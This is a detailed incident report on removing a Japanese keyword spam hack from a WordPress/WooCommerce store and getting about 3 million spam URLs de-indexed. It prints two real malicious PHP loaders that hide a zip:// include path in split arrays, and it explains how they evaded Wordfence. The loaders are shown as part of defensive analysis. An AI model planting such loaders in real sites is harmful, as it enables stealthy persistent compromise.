Japanese SEO Spam Hack Cleanup: 3M+ URLs Removed

TL;DR — Quick Summary

A WordPress/WooCommerce site (plushtery.com) was infected with a Japanese keyword hack that generated over 3 million spam URLs indexed by Google. The attackers planted 13 malicious files, including PHP loaders that used split-array obfuscation to evade Wordfence and other scanners. I cleaned the infection across 4 sessions: removing malware, hardening security, and getting the spam URLs de-indexed with a 410 Gone rule and a cleanup sitemap submitted through Google Search Console. The key lesson: automated scanners can miss obfuscated malware, so manual investigation is essential.

In February 2026, I was called in to investigate a WordPress/WooCommerce site that had been flagged by Google Merchant Center for "misrepresentation." What started as a routine compliance check turned into one of the most sophisticated malware investigations I've ever handled. The site had been silently hijacked by a Japanese SEO spam hack that had injected over 3 million spam URLs into Google's index, all while the site looked perfectly normal to anyone visiting it.

This is the full story of how I found and removed every trace of the attack, and then tackled the massive challenge of getting 3 million spam URLs removed from Google.

The Client and the Problem

The site was plushtery.com, a WooCommerce store hosted with a web hosting provider and running the Minimog theme with a child theme. Around January 15, 2026, the site owner received a notification from Google Merchant Center flagging the site for misrepresentation. GMC listed six compliance issues, including missing policy links, placeholder images, and broken social media links.

On February 19, while investigating those GMC issues, the site owner noticed something alarming: Japanese and Chinese text appearing in Google search results for plushtery.com. Google was showing results about Hamilton watches and luxury goods under the plushtery.com domain.

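This is classic Japanese SEO spam, also known as a Japanese keyword hack. It's one of the most common WordPress attacks in the wild. The hackers use cloaking to show spam content to search engine crawlers while the site appears completely normal to human visitors. This hack was very likely the real cause of the GMC misrepresentation flag, although the malware files I later found are dated a week after the notification, so either the compromise began earlier than those file dates suggest or the flag also had other causes.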

Background and Timeline

Here's how the attack unfolded based on file dates and server evidence:

January 15, 2026 -- GMC misrepresentation notification received
January 22, 2026 -- Malware files created on the server (db.php and wp-the.php both dated this day)
February 10-11, 2026 -- 8 casino spam posts published by the rogue optimerchant admin account
February 19, 2026 -- Japanese text discovered in Google search results
February 22, 2026 -- Full investigation and cleanup completed across three sessions
February 23, 2026 -- Google de-indexing work: .htaccess 410 rule and spam sitemap submitted

A quick note on Cloudflare: the site was behind Cloudflare, but Cloudflare does NOT protect against compromised WordPress credentials, vulnerable plugins, brute force attacks on wp-login.php, or supply chain attacks. The attacker likely got in through one of these vectors, not a network-level attack.

Session 1: Initial Investigation

I started the investigation on February 22, working through WP Admin and the hosting provider's file manager.

Admin Users Audit

The first thing I checked was the user list. Under Users > All Users, I found 6 administrator accounts. Three were legitimate:

the site owner ([redacted]) -- owner's account
my-admin ([redacted]) -- my account
site-admin ([redacted]) -- currently logged-in admin

And three were clearly malicious:

bot (bot@[redacted]) -- fake email, suspicious username
zetgifari ([redacted]@gmail.com) -- unknown person, zero posts
optimerchant ([redacted]@gmail.com) -- registered to "Tonmoy A", published all the casino spam

I deleted all three rogue accounts immediately.

Spam Content Discovery

Next I checked Posts > All Posts and found 8 casino and gambling spam posts, all published by Tonmoy A (the optimerchant account) on February 10-11, 2026. The posts were in six different languages:

German: "Lemon Casino Login..."
English: "Forge Your Fortune... captainspins Casino"
Italian: "Trasforma il Rischio in Oro... Casino"
Romanian: "Afla cum sa maximizezi... chicken road..."
Dutch: "Verhoog je winkansen met... monixbet casino"
Spanish: "Emocionatate con la adrenalina... casino onli"
Dutch (again): "Verhoog je spelplezier... kansspelen... bonussen"
English: "Fortunes Cascade... plinko Gameplay & Strategic Betting"

Only 3 legitimate posts existed on the site. I deleted all 8 spam posts and emptied the trash.

Plugins and Code Snippets

I audited the plugins list: 37 total, 24 needing updates, but no obviously malicious plugins. The Code Snippets plugin had 17 snippets (5 active), all legitimate store operations like fraud detection and PayPal management.

File-Level Investigation

This is where things got interesting. Using the hosting provider's file manager, I found suspicious files in the web root:

wp-asudo.php (109.85 KiB) -- A heavily obfuscated PHP web shell using goto chains, eval(), and base64 encoding. This was a full backdoor giving the attacker complete server access.
sg (7.72 KiB) -- A binary file with no extension. Suspicious.
gfe.txt (1 byte) -- A tiny marker file. Its purpose would become clear later.

I also checked .htaccess (1.75 KiB) against its backup .htaccess.bk (714 B). The main file was 2.5x larger but turned out to be clean -- just standard WordPress rules plus LiteSpeed cache rules.

I deleted wp-asudo.php and sg immediately. At this point, I thought I had cleaned the hack. I was wrong.

Session 2: Deep Investigation and Root Cause Discovery

I started the second session about 30 minutes later, continuing with the hosting provider file manager and custom PHP diagnostics.

The Clue That Changed Everything

I deleted gfe.txt (the 1-byte marker file). Then I checked again a few minutes later. It was back. The file kept regenerating itself. This meant active malware was still executing on every request, and I had only removed the surface-level artifacts.
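The delete-and-recheck test can be automated. The following is a minimal sketch, assuming a script with filesystem access to the web root (something I did not necessarily have through the file manager); the function name and the `trigger` callback are hypothetical, and `trigger` stands in for anything that makes the site serve at least one request.

```python
import os
import time
from typing import Callable


def marker_regenerates(path: str, trigger: Callable[[], None],
                       wait_seconds: float = 1.0) -> bool:
    """Delete `path`, provoke a request, and report whether the file came back."""
    if os.path.exists(path):
        os.remove(path)
    trigger()                 # e.g. fetch the homepage so WordPress runs once
    time.sleep(wait_seconds)  # give the server a moment to write the file
    return os.path.exists(path)
```

If this returns True, something on the server is still recreating the file, and the cleanup is not finished.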

Checking All the Usual Hiding Spots

I verified the following files and directories were clean:

wp-content/themes/minimog-child/functions.php -- 13 lines, only enqueues stylesheet
wp-content/themes/minimog/functions.php -- 125 lines, standard theme functions
wp-content/uploads/ -- normal upload folders
wp-content/mu-plugins/ -- 3 legitimate hosting provider/Elementor files
.user.ini -- does not exist (good, this is a common hiding spot)
wp-config.php -- 111 lines, clean
wp-includes/class-wp.php -- 841 lines, clean
wp-settings.php -- 765 lines, clean

Installing Wordfence

I installed Wordfence Security (v8.1.4, free version) and ran a quick scan. Result: 28 findings, ALL plugin upgrade notifications. Zero malware detected. The malware was completely invisible to Wordfence's quick scan. More on why later.

Database Diagnostics

I created a temporary PHP diagnostic script on the server to query the WordPress database directly. I checked:

wp_options for eval/base64/gfe references -- Clean
All cron jobs -- Clean (all from legitimate plugins)
Active plugins list -- Clean (33 legitimate plugins)
Suspicious transients -- Clean
User meta for remaining admin accounts -- Clean
Recent posts and pages -- Clean (after spam deletion)

The database was completely clean. The malware lived entirely in the filesystem.
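As an illustration of the wp_options check, here is a small sketch of the pattern matching involved. It assumes the rows have already been fetched as (option_name, option_value) pairs by whatever database client is available; the function name is hypothetical, and the three patterns simply mirror the eval/base64/gfe references listed above.

```python
import re
from typing import Iterable, List, Optional, Tuple

# Patterns mirroring the checks described above: eval(...), base64, gfe.
SUSPICIOUS = re.compile(r"eval\s*\(|base64|gfe", re.IGNORECASE)


def flag_suspicious_options(
    rows: Iterable[Tuple[str, Optional[str]]]
) -> List[str]:
    """Return the names of options whose value matches a suspicious pattern."""
    return [name for name, value in rows if SUSPICIOUS.search(value or "")]
```

A match is only a prompt for manual review: plenty of legitimate plugins store base64 data in their options.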

Finding wp-the.php: Malware Loader Number 1

While running a diagnostic that listed non-standard PHP files in the root directory, I discovered wp-the.php (153 bytes, dated January 22, 2026). I had to use charCodeAt encoding to read its contents because the browser content filter was blocking display of the PHP code.

Here's what it contained:

php

<?php
$paths = [
    'base' => ['zip:/'],
    'file' => ['/sg#'],
    'module' => ['tyu']
];
include implode("", array_map(fn($p) => $p[0], $paths));
?>

This reconstructs to: include 'zip://sg#tyu'

It was loading malware from inside the sg ZIP archive, specifically a file named tyu stored inside it. Since I had already deleted sg in Session 1, this loader was broken. But the fact that gfe.txt was still regenerating meant there was another active loader somewhere.

I deleted wp-the.php.

The Breakthrough: wp-content/db.php

I ran a diagnostic specifically checking for WordPress "drop-in" plugins, which are special PHP files in wp-content that WordPress loads early in its startup sequence, before any regular plugin. The diagnostic revealed:

wp-content/db.php (170 bytes, dated January 22, 2026)

This was THE ROOT CAUSE. Here's its content:

php

<?php
$paths = [
    'base' => ['zip:/'],
    'file' => ['/wp-includes/ww#'],
    'module' => ['yp']
];
include implode("", array_map(fn($p) => $p[0], $paths));
?>

This reconstructs to: include 'zip://wp-includes/ww#yp'

Why db.php Was So Dangerous

wp-content/db.php is a WordPress drop-in plugin. WordPress loads it before all other plugins, including security plugins like Wordfence. This means:

The malware executed on every single WordPress request before any security tool could intervene
It intercepted requests like ?sitemap346.xml and served dynamic spam sitemaps to Googlebot
It regenerated the gfe.txt marker file on each request
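Wordfence could not intervene at request time because the malware ran first

Load order explains why nothing blocked the malware while it was serving spam: it was already running before Wordfence even loaded. The quick scan missed the loader file itself for a different reason, covered in the technical analysis below.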
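A drop-in check is easy to script. The sketch below assumes filesystem access to wp-content and uses the drop-in filenames that WordPress recognises (single-site and multisite); the function name is hypothetical. It only reports what is present, since a caching or database plugin can legitimately install some of these files.

```python
import os
from typing import Dict

# Drop-in filenames WordPress looks for in wp-content.
KNOWN_DROPINS = (
    "advanced-cache.php", "db.php", "db-error.php", "install.php",
    "maintenance.php", "object-cache.php", "php-error.php",
    "fatal-error-handler.php", "sunrise.php", "blog-deleted.php",
    "blog-inactive.php", "blog-suspended.php",
)


def find_dropins(wp_content: str) -> Dict[str, int]:
    """Map each drop-in file present in wp_content to its size in bytes."""
    found = {}
    for name in KNOWN_DROPINS:
        path = os.path.join(wp_content, name)
        if os.path.isfile(path):
            found[name] = os.path.getsize(path)
    return found
```

Any drop-in that no installed plugin accounts for, especially a tiny one like the 170-byte db.php here, deserves a manual read.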

Deleting the ZIP Payload

The malware payload was at wp-includes/ww (1,880 bytes), a ZIP archive containing the actual malicious code in a file named yp. The wp-includes directory is massive and the hosting provider's file manager uses virtual scrolling, so I couldn't find the file visually. I used a PHP unlink() command in my diagnostic script to delete it programmatically.

After deleting both db.php and wp-includes/ww, I checked gfe.txt again. It stopped regenerating. The active malware was finally dead.

Final Verification of Session 2

I verified all malware files were gone:

wp-includes/ww (1,880 bytes) -- Deleted
gfe.txt (1 byte) -- Deleted, no longer regenerates
wp-content/db.php (170 bytes) -- Deleted
wp-the.php (153 bytes) -- Deleted
sg (7.72 KiB) -- Deleted (Session 1)
wp-asudo.php (109.85 KiB) -- Deleted (Session 1)

I also tested the spam sitemaps: fetching https://plushtery.com/?sitemap346.xml now returned the normal homepage instead of spam XML. The dynamic spam sitemaps were gone.

Finally, I deleted my diagnostic script from the server since leaving it there would be its own security risk.

How the Malware Worked: Technical Analysis

Now that I've described the investigation, let me break down exactly how this attack was engineered.

The Attack Architecture

Here's the execution flow:

text

Request comes in (e.g., ?sitemap346.xml)
    |
    v
WordPress loads wp-content/db.php (drop-in, before ALL plugins)
    |
    v
db.php reconstructs: include 'zip://wp-includes/ww#yp'
    |
    v
PHP zip:// stream wrapper extracts and executes 'yp' from ZIP file 'ww'
    |
    v
Malware code runs:
  - Checks if request matches spam patterns
  - If Googlebot: serves spam content (Japanese text, fake sitemaps)
  - If human visitor: passes through to normal WordPress
  - Regenerates gfe.txt marker file
  - Maintains robots.txt spam entries

The Split-Array Obfuscation

The loader files used a clever technique to hide the malicious include path:

php

$paths = [
    'base' => ['zip:/'],
    'file' => ['/wp-includes/ww#'],
    'module' => ['yp']
];
include implode("", array_map(fn($p) => $p[0], $paths));

The path zip://wp-includes/ww#yp is split across three array elements and reconstructed at runtime with implode and array_map. This is simple but devastatingly effective against security scanners.
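To see what a loader like this resolves to without ever executing it, the fragments can be joined statically. This is a rough sketch that assumes the exact layout shown above (an array whose values are one-element arrays of string literals); the function names are hypothetical and the regex is not a general PHP parser.

```python
import re
from typing import Tuple

# Matches  'key' => ['first-element'  and captures the first element.
FIRST_ELEMENT = re.compile(r"=>\s*\[\s*(['\"])(.*?)\1")


def reconstruct_include_target(php_source: str) -> str:
    """Join the first element of each inner array, as implode/array_map would."""
    return "".join(m.group(2) for m in FIRST_ELEMENT.finditer(php_source))


def split_zip_target(target: str) -> Tuple[str, str]:
    """Split 'zip://archive#entry' into (archive, entry)."""
    if not target.startswith("zip://"):
        raise ValueError("not a zip:// target")
    archive, _, entry = target[len("zip://"):].partition("#")
    return archive, entry
```

Fed the db.php source above, `reconstruct_include_target` returns `zip://wp-includes/ww#yp`, and `split_zip_target` separates that into the archive `wp-includes/ww` and the entry `yp`.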

Why It Evaded Wordfence

This malware evaded detection for several reasons:

No dangerous function signatures -- No eval(), base64_decode(), gzinflate(), or other patterns that scanners look for
Split path strings -- The malicious path is fragmented across array elements, defeating grep and pattern matching
Legitimate PHP feature abuse -- zip:// is a standard PHP stream wrapper (provided by the zip extension), so its use is not malicious in itself
No file extensions on payloads -- The ZIP files sg and ww had no .php extension, so they were never scanned as PHP code
Drop-in priority -- db.php loaded before Wordfence could even initialize, so nothing could block it at request time
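Since the payloads were ZIP archives with no file extension, one complementary check is to look at file contents rather than names. The sketch below assumes filesystem access to the site root; the function name is hypothetical. It walks a directory tree, tests every extensionless file with Python's `zipfile.is_zipfile`, and lists the entries of any archive it finds without extracting or executing anything.

```python
import os
import zipfile
from typing import Dict, List


def find_extensionless_zips(root: str) -> Dict[str, List[str]]:
    """Map each extensionless ZIP archive under root to its entry names."""
    hits = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if "." in name:
                continue  # only files with no extension, like sg and ww
            path = os.path.join(dirpath, name)
            if zipfile.is_zipfile(path):
                with zipfile.ZipFile(path) as archive:
                    hits[path] = archive.namelist()
    return hits
```

On a stock WordPress install this would normally come back empty, so any hit is worth investigating.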

The Cloaking Mechanism

The malware used user-agent detection to cloak its behavior:

Googlebot and other crawlers received spam content: Japanese text about Hamilton watches, luxury goods, casino links, and fake product sitemaps
Human visitors got the normal WordPress site, completely unmodified
Site owners had no visual indication anything was wrong

This is why the hack went undetected for about four weeks, from the January 22 file dates to the February 19 discovery. The only way to notice it from the outside was to check what Google was actually indexing.
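A quick way to probe for user-agent cloaking is to request the same URL twice with different User-Agent headers and compare the responses. This is a sketch under stated assumptions: the function names and the browser User-Agent string are illustrative, and the Googlebot string is the commonly published one. Some cloaking kits also verify the crawler's IP address, in which case a spoofed header will not trigger the spam, and dynamic pages can differ between any two requests, so treat a difference as a reason to look closer rather than as proof.

```python
import urllib.request
from typing import Callable

BROWSER_UA = ("Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 "
              "(KHTML, like Gecko) Chrome/120.0 Safari/537.36")
GOOGLEBOT_UA = ("Mozilla/5.0 (compatible; Googlebot/2.1; "
                "+http://www.google.com/bot.html)")


def fetch_as(url: str, user_agent: str, timeout: float = 10.0) -> bytes:
    """Fetch url with the given User-Agent header and return the raw body."""
    request = urllib.request.Request(url, headers={"User-Agent": user_agent})
    with urllib.request.urlopen(request, timeout=timeout) as response:
        return response.read()


def differs_for_googlebot(
    url: str, fetch: Callable[[str, str], bytes] = fetch_as
) -> bool:
    """True if the body served to a Googlebot UA differs from the browser one."""
    return fetch(url, BROWSER_UA) != fetch(url, GOOGLEBOT_UA)
```

The `fetch` parameter exists so the comparison can be exercised with a stub instead of live requests.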

Redundant Backdoor Chains

The attacker was thorough. They installed two completely independent backdoor chains:

Chain 1: wp-the.php loads zip://sg#tyu
Chain 2: wp-content/db.php loads zip://wp-includes/ww#yp

If you found and deleted Chain 1, Chain 2 would keep running. If you deleted Chain 2, Chain 1 would take over. You had to find and remove both chains plus both ZIP payloads to actually stop the malware. On top of that, wp-asudo.php provided a standalone web shell for the attacker to regain access and reinstall everything if needed.

The Marker File Pattern

gfe.txt was a 1-byte file that the malware regenerated on every WordPress request. It appears to have served as a heartbeat: if the file exists, the malware (or its operator) can tell that it is running. More importantly for me, its continued regeneration after deletion was the critical indicator that told me active malware was still present when I thought I'd cleaned everything in Session 1.

Session 3: Wordfence Full Scan and Security Hardening

After the manual cleanup, I ran a Wordfence full scan (not the quick scan from earlier). This scanned 35,952 files, 40 plugins, 7 themes, 19 posts, and 5,505 URLs. It took about 7 minutes.

7 Additional Malicious Files

The full scan found 7 more malicious index.php files planted deep in non-standard WordPress core subdirectories:

wp-includes/sodium_compat/src/PHP52/user/index.php
wp-admin/css/colors/sunrise/litespeed/index.php
wp-admin/js/widgets/sunrise/index.php
wp-includes/block-patterns/images/index.php
wp-admin/images/plushtery.com/index.php
wp-admin/user/used-css/index.php
wp-content/wpvividbackups/wpvivid_log/error/sync_logs/index.php

These were hidden backdoor files planted in directories that few people would think to check manually. Paths like wp-admin/css/colors/sunrise/litespeed/ and wp-includes/sodium_compat/src/PHP52/user/ sit so deep in the WordPress directory tree that a manual inspection is unlikely to reach them. I deleted all 7 through Wordfence.

This brought the total to 13 malicious files removed: 6 found manually and 7 found by Wordfence's full scan. The lesson here is clear: automated scanning is essential as a complement to manual investigation, even when the scanner initially fails.
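Files planted inside wp-admin and wp-includes can also be caught by comparing the tree against a known-good file list, because core directories should contain nothing beyond what ships with WordPress. The sketch below assumes `known_paths` comes from a clean copy of the same WordPress version (or from the official checksums that WP-CLI's `wp core verify-checksums` relies on); the function name is hypothetical. It does not cover wp-content, where one of the seven files lived.

```python
import os
from typing import Iterable, List


def unexpected_core_files(root: str, known_paths: Iterable[str]) -> List[str]:
    """List files under wp-admin/ and wp-includes/ that are not in known_paths.

    Paths are relative to root and use forward slashes.
    """
    known = set(known_paths)
    extras = []
    for core_dir in ("wp-admin", "wp-includes"):
        for dirpath, _dirs, files in os.walk(os.path.join(root, core_dir)):
            for name in files:
                full = os.path.join(dirpath, name)
                rel = os.path.relpath(full, root).replace(os.sep, "/")
                if rel not in known:
                    extras.append(rel)
    return sorted(extras)
```

A check like this would surface both the stray index.php files and an extensionless payload such as wp-includes/ww in one pass.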

Security Hardening

With the malware gone, I hardened the site:

DISALLOW_FILE_EDIT -- Added define('DISALLOW_FILE_EDIT', true); to wp-config.php. This disables the Theme and Plugin Editor in WP Admin, closing off one easy code-injection path if an admin account is compromised. It does not block plugin or theme installation; that requires DISALLOW_FILE_MODS.
Limit Login Attempts Reloaded (v2.26.28) -- Installed and activated. Blocks brute-force attacks: 4 failed attempts trigger a 20-minute lockout, and 4 lockouts trigger a 24-hour lockout.
WP 2FA (v3.1.1) -- Installed and activated. Enables two-factor authentication via authenticator apps or email with backup codes. Each admin still needs to set it up from their profile.
Wordfence WAF optimized -- Configured auto_prepend_file for LiteSpeed/lsapi so the WAF runs before any vulnerable code loads.
Wordfence auto-updates enabled -- Ensures the scanner stays current.

Session 4: The Google De-Indexing Challenge

With the malware removed and the site secured, I faced an equally daunting problem: 3.03 million spam URLs were still sitting in Google's index. The hack was gone, but Google still showed Japanese spam results for plushtery.com.

There were two spam URL patterns:

https://plushtery.com/?products/XXXXXXXX -- Fake product pages (the majority)
https://plushtery.com/?ctg/search/similarImageSearchResultView/?ctgItemCd=XXXXXXXX -- Fake category pages

Why GSC Removals Tool Couldn't Help

My first instinct was to use Google Search Console's Removals tool with prefix-based removal. I entered https://plushtery.com/?products/ and selected "Remove all URLs with this prefix."

Google showed a critical warning: "Remove entire site?"

Here's the problem: in URL structure, ? starts the query string. So the path component of https://plushtery.com/?products/ is just / (the root). A prefix removal on / would hide the entire site from Google's results for about 6 months. I cancelled immediately.

This is a fundamental limitation of the GSC Removals tool: it cannot selectively remove URLs that differ only in query parameters.
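The path-versus-query split is easy to confirm with a standard URL parser. A minimal illustration using Python's `urllib.parse` (the helper name is hypothetical):

```python
from urllib.parse import urlsplit


def path_and_query(url: str):
    """Return the (path, query) components of a URL."""
    parts = urlsplit(url)
    return parts.path, parts.query


print(path_and_query("https://plushtery.com/?products/35132703"))
# ('/', 'products/35132703')
```

Everything after the ? belongs to the query string, so every spam URL shares the single path / with the real homepage.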

The Solution: 410 Gone via .htaccess

I settled on a two-pronged approach. First, I added a rewrite rule to .htaccess that returns HTTP 410 (Gone) for all spam URL patterns:

apache

# Block Japanese hack spam URLs - Return 410 Gone
RewriteCond %{QUERY_STRING} ^(products(/|%2F)|ctg(/|%2F)) [NC]
RewriteRule .* - [G,L]

Key details about this rule:

[G] flag returns 410 Gone, which tells crawlers the page was removed on purpose and is generally a slightly stronger de-indexing signal than 404
The pattern matches both / and %2F (URL-encoded slash) because Google had indexed URLs with both variants
[NC] makes it case-insensitive
It catches both spam patterns: ?products/... and ?ctg/...

This took three iterations to get right. The first version only matched ?products/, the second added %2F handling after discovering encoded URLs, and the third added the ?ctg/ pattern after analyzing the GSC data export.

Verification results:

https://plushtery.com/?products/35132703 -- 410 Gone
https://plushtery.com/?products%2F27245781 -- 410 Gone
https://plushtery.com/?ctg/search/similarImageSearchResultView/?ctgItemCd=26660260 -- 410 Gone
https://plushtery.com/ (homepage) -- 200 OK (unaffected)
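Before touching a live .htaccess, the pattern itself can be checked offline. The sketch below mirrors the RewriteCond regex in Python, on the assumption that Apache's and Python's regex engines treat this simple pattern identically; the function name is hypothetical. The input is the raw query string without the leading ?, which is how Apache exposes %{QUERY_STRING} (not URL-decoded, so %2F appears literally).

```python
import re

# Same pattern as the RewriteCond; IGNORECASE plays the role of [NC].
SPAM_QUERY = re.compile(r"^(products(/|%2F)|ctg(/|%2F))", re.IGNORECASE)


def would_return_410(query_string: str) -> bool:
    """True if the rule's condition matches this raw query string."""
    return SPAM_QUERY.search(query_string) is not None


for qs in ("products/35132703", "products%2F27245781", "", "p=123"):
    print(repr(qs), would_return_410(qs))
```

Because the pattern is anchored at the start, ordinary WordPress queries such as ?p=123 or ?s=products do not match.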

Spam Cleanup Sitemap

The second prong was creating a sitemap to accelerate Google's re-crawl. I exported 1,000 indexed spam URLs from GSC (the maximum it allows), which broke down to 873 product URLs and 127 CTG URLs. I created spam-cleanup-sitemap.xml with all 1,000 URLs and submitted it to Google Search Console.

The sitemap was accepted with Status: Success, and Google discovered all 1,000 pages. When Googlebot re-crawls these URLs and gets a 410 response, it should de-index them sooner than it would if left to natural re-crawling.
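Building a sitemap from an exported URL list takes only a few lines. This is a minimal sketch rather than the exact script I used: it assumes the URLs are already in a Python list, and the function name is hypothetical. Using an XML library instead of string concatenation matters here because spam URLs can contain characters such as & that must be escaped.

```python
import xml.etree.ElementTree as ET
from typing import Iterable

SITEMAP_NS = "http://www.sitemaps.org/schemas/sitemap/0.9"


def build_sitemap(urls: Iterable[str]) -> bytes:
    """Return a sitemap XML document with one <url><loc> per input URL."""
    urlset = ET.Element("urlset", xmlns=SITEMAP_NS)
    for url in urls:
        ET.SubElement(ET.SubElement(urlset, "url"), "loc").text = url
    return ET.tostring(urlset, encoding="utf-8", xml_declaration=True)
```

The resulting bytes can be written to a file such as spam-cleanup-sitemap.xml. The sitemap protocol caps a single file at 50,000 URLs, so the 1,000-URL export fits comfortably.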

GSC Security Check

I also checked GSC's Security Issues and Manual Actions sections. Both showed no issues detected. The hack used cloaking effectively enough that Google didn't flag it as a security issue -- it just indexed the spam content. This meant no manual review request was needed, which was good news.

De-Indexing Timeline

The 410 rule takes effect immediately for all new crawl requests
Google typically de-indexes pages returning 410 within 2-4 weeks
The sitemap-listed 1,000 URLs should be de-indexed within days
The remaining 3 million URLs will be de-indexed as Googlebot naturally re-crawls and encounters the 410

Complete Malicious Artifacts Inventory

Here's every malicious artifact found and removed, for reference:

Rogue Admin Accounts (3 deleted)

bot (bot@[redacted]) -- Fake email, suspicious username
zetgifari ([redacted]@gmail.com) -- Unknown person, 0 posts
optimerchant ([redacted]@gmail.com) -- "Tonmoy A", published 8 casino spam posts

Spam Content (8 posts deleted)

Multilingual casino and gambling spam in German, English, Italian, Romanian, Dutch, and Spanish. All published February 10-11 by the rogue optimerchant account.

Malicious Files: Manual Discovery (6 files)

wp-asudo.php (109.85 KiB) in /public_html/ -- PHP web shell with goto chains, eval, base64 obfuscation
sg (7.72 KiB) in /public_html/ -- ZIP archive containing malware payload tyu
gfe.txt (1 byte) in /public_html/ -- Marker/heartbeat file regenerated by malware on each request
wp-the.php (153 bytes) in /public_html/ -- Malware loader #1, loads zip://sg#tyu
wp-content/db.php (170 bytes) -- ROOT CAUSE, WordPress drop-in, loads zip://wp-includes/ww#yp before all plugins
wp-includes/ww (1,880 bytes) -- ZIP archive containing actual malware payload yp

Malicious Files: Wordfence Discovery (7 files)

wp-includes/sodium_compat/src/PHP52/user/index.php
wp-admin/css/colors/sunrise/litespeed/index.php
wp-admin/js/widgets/sunrise/index.php
wp-includes/block-patterns/images/index.php
wp-admin/images/plushtery.com/index.php
wp-admin/user/used-css/index.php
wp-content/wpvividbackups/wpvivid_log/error/sync_logs/index.php

Total: 13 malicious files removed (6 manual + 7 Wordfence)

Configuration Fixed

robots.txt -- Removed 20+ injected spam sitemap entries, restored to standard WordPress format
.htaccess -- Added 410 Gone rule for spam URL patterns

Key Takeaways

Here are the ten most important lessons from this cleanup:

1. wp-content/db.php is a critical hiding place for persistent malware. WordPress drop-in plugins load before regular plugins, including security plugins. Always check for unexpected drop-in files like db.php and advanced-cache.php.

2. ZIP stream wrapper obfuscation is extremely effective. The zip://file#entry technique evades most scanners because there are no dangerous function signatures, the path is split across array elements, and the ZIP payloads have no file extension.

3. Attackers build redundancy. Two independent backdoor chains meant deleting one had zero effect. You must find and remove every single component.

4. Marker files are your friend. The regenerating gfe.txt was the critical clue that active malware was still running. Without noticing this, I might have declared the cleanup complete after Session 1.

5. Quick scans are not enough. Wordfence's quick scan found zero malware, but the full scan found 7 additional malicious files. Always run the comprehensive scan.

6. Cloaking makes hacks invisible. The site looked perfect to human visitors. The only way to discover this hack was to check Google search results or inspect server files directly.

7. Custom diagnostics are essential. When automated tools fail, you need to write custom scripts. I wrote PHP diagnostics to trace WordPress hooks, search for non-standard files, check drop-in plugins, and decode obfuscated file contents.

8. Cleaning malware is only half the battle. Even after complete cleanup, 3 million spam URLs remained in Google's index. The GSC Removals tool cannot handle query-parameter spam. You need a 410 Gone rule plus a spam cleanup sitemap.

9. URL encoding matters in security rules. My first .htaccess rule missed URLs with %2F instead of /. Hackers generate URLs with encoded characters, so security rules must handle both variants.

10. Always analyze real GSC data. I initially focused on ?products/ URLs, but the GSC export revealed a second pattern: ?ctg/search/similarImageSearchResultView/. Never assume a single pattern covers everything.